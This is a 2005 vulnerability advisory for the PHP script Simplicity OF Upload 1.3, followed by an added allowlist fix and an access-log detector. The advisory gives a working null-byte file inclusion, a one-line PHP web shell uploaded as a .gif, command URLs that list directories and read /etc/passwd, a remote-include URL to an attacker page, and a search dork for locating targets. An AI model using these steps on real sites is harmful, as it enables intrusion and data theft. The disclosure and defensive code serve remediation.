26/07/2005 16.09.18

Simplicity OF Upload 1.3 (possibly prior versions) remote code execution
& cross site scripting

software:
author site: http://www.phpsimplicity.com/scripts.php?id=3

remote commands execution:

problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
    $language = strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
...

the "language" value is used as an include path without any validation, so you
can include any file by appending a null byte to the "language" parameter value
(the null byte ends the path before the ".lng" suffix is appended):

example:
http://localhost:30/simply/download.php?language=upload.php%00

you will see upload & download page together :)

so you can upload a cmd.gif file (when you upload a .php file, usually it is
renamed to .html...) with this php code inside to execute commands:

<?php

system($HTTP_GET_VARS[command]);

?>

then try this url:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

to list directories

http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd

to show /etc/passwd file

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:

http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00

googledork:

"Powered By: Simplicity oF Upload"

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html
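The root cause in the quoted lines 25-30 is that the raw "language" value becomes an include path. The following is an added example, not code from Simplicity OF Upload or from rgod's advisory, showing the allowlist-based replacement a maintainer would write for that language-override block. The function name resolve_language_file, the directory variable $langDir and the $allowed list are assumptions made for this demo; the self-check at the bottom uses constructed inputs, including the null-byte, traversal and remote-URL values from the advisory, and expects every one of them to be rejected.

```php
<?php
// Added example (not from the advisory or the project): hardened replacement
// for the "language" override in download.php. Assumes language files live in
// a fixed directory $langDir and that the shipped language codes are known.
declare(strict_types=1);

/**
 * Map the user-supplied "language" value to a language file path, or return
 * null when the value is not one of the allowed language codes.
 */
function resolve_language_file(?string $requested, string $langDir, array $allowed, string $default = 'english'): ?string
{
    // Missing or empty parameter: keep the configured default, as the original
    // code did when no override was supplied.
    if ($requested === null || $requested === '') {
        $requested = $default;
    }
    $code = strtolower($requested);

    // A language code is a short, purely alphabetic name. This one check already
    // rejects "upload.php\0", "../../etc/passwd" and "http://evil/page\0"
    // because of the dot, slash, colon and NUL characters they contain.
    if (!preg_match('/\A[a-z]{2,16}\z/', $code)) {
        return null;
    }

    // Allowlist: the value must name a language the application actually ships.
    if (!in_array($code, $allowed, true)) {
        return null;
    }

    // Build the path from the vetted code only; raw input never reaches require.
    $path = rtrim($langDir, '/') . '/' . $code . '.lng';

    // Defence in depth: confirm the resolved file really sits inside $langDir.
    $real    = realpath($path);
    $realDir = realpath($langDir);
    if ($real === false || $realDir === false
        || strpos($real, $realDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// --- self-check with constructed inputs (run: php this_file.php) ---
$langDir = sys_get_temp_dir() . '/simply_lang_demo';   // constructed demo dir
@mkdir($langDir);
file_put_contents($langDir . '/english.lng', "<?php \$lang['title'] = 'Upload';\n");
$allowed = ['english', 'italian'];

$cases = [
    'english'                    => true,   // legitimate override
    'ENGLISH'                    => true,   // case-folded like the original code
    'italian'                    => false,  // allowed code, but no file on disk
    "upload.php\0"               => false,  // null-byte trick from the advisory
    "cmd.gif\0"                  => false,
    '../../etc/passwd'           => false,  // traversal
    "http://evil.example/page\0" => false,  // remote include / redirect case
    ''                           => true,   // empty falls back to the default
];
foreach ($cases as $input => $expectValid) {
    $got = resolve_language_file($input, $langDir, $allowed) !== null;
    printf("%-32s -> %s\n", addcslashes($input, "\0"), $got === $expectValid ? 'OK' : 'FAIL');
}
```

The caller then does `require_once $file;` only when the function returns a path and answers with a 404 or the default language otherwise. PHP 5.3.4 and later refuse paths containing a NUL byte in filesystem functions, which closes the `%00` trick specifically, but the allowlist is what actually removes the bug: it also stops traversal, remote URLs and any future bypass that does not rely on a null byte.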
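For anyone checking whether an exposed install has already been probed, the request shapes the advisory gives (a `%00` in the language parameter, a remote URL in it, and a `command` parameter on download.php) are easy to pick out of web-server logs. This is an added example, not part of rgod's advisory or of the project: a small PHP pass over combined-log-format access log lines. The helper name find_language_injection and the log lines in $sampleLog are constructed for the demo (documentation-range IP addresses, timestamps matching the advisory date).

```php
<?php
// Added example (not from the advisory or the project): flag access log lines
// whose download.php request carries the indicators described in the advisory.
declare(strict_types=1);

/**
 * Inspect combined-format log lines; return [lineIndex => [reason, ...]] for hits.
 */
function find_language_injection(array $lines): array
{
    $hits = [];
    foreach ($lines as $idx => $line) {
        // Pull the request target out of the quoted request field.
        if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"#', $line, $m)) {
            continue;
        }
        $target = $m[1];

        // Only download.php honoured the language override in the advisory.
        if (strpos($target, 'download.php?') === false) {
            continue;
        }
        $reasons = [];

        if (preg_match('/[?&]language=([^&\s]*)/', $target, $lm)) {
            $value = rawurldecode($lm[1]);   // "%00" becomes a real NUL byte here
            if (strpos($value, "\0") !== false) {
                $reasons[] = 'null byte in language parameter';
            }
            if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
                $reasons[] = 'remote URL in language parameter';
            }
            if (strpos($value, '..') !== false) {
                $reasons[] = 'path traversal in language parameter';
            }
            // A shipped language file is a short alphabetic code; dots, slashes
            // or file extensions are never a legitimate override.
            if (!preg_match('/\A[a-z]{2,16}\z/i', $value)) {
                $reasons[] = 'language value is not a plain language code';
            }
        }
        // The advisory's uploaded script read its command from "command".
        if (preg_match('/[?&]command=/', $target)) {
            $reasons[] = 'command parameter on download.php';
        }
        if ($reasons) {
            $hits[$idx] = array_values(array_unique($reasons));
        }
    }
    return $hits;
}

// --- constructed sample log; only line 1 and line 5 are benign ---
$sampleLog = [
    '203.0.113.5 - - [26/Jul/2005:16:09:18 +0200] "GET /simply/download.php?language=english HTTP/1.1" 200 2310',
    '203.0.113.5 - - [26/Jul/2005:16:09:40 +0200] "GET /simply/download.php?language=upload.php%00 HTTP/1.1" 200 4112',
    '203.0.113.5 - - [26/Jul/2005:16:10:02 +0200] "GET /simply/download.php?language=cmd.gif%00&command=ls HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Jul/2005:16:10:30 +0200] "GET /simply/download.php?language=http://evil.example/page%00 HTTP/1.1" 200 980',
    '198.51.100.9 - - [26/Jul/2005:16:11:00 +0200] "GET /simply/upload.php HTTP/1.1" 200 1800',
];
foreach (find_language_injection($sampleLog) as $idx => $reasons) {
    printf("line %d: %s\n", $idx + 1, implode('; ', $reasons));
}
```

Run against real logs, the "command parameter" hit is the one worth treating as a likely compromise rather than a probe, because the advisory's payload only works after a file has already been uploaded and included; the next step is to list recently uploaded files in the upload directory and check them for PHP tags regardless of extension.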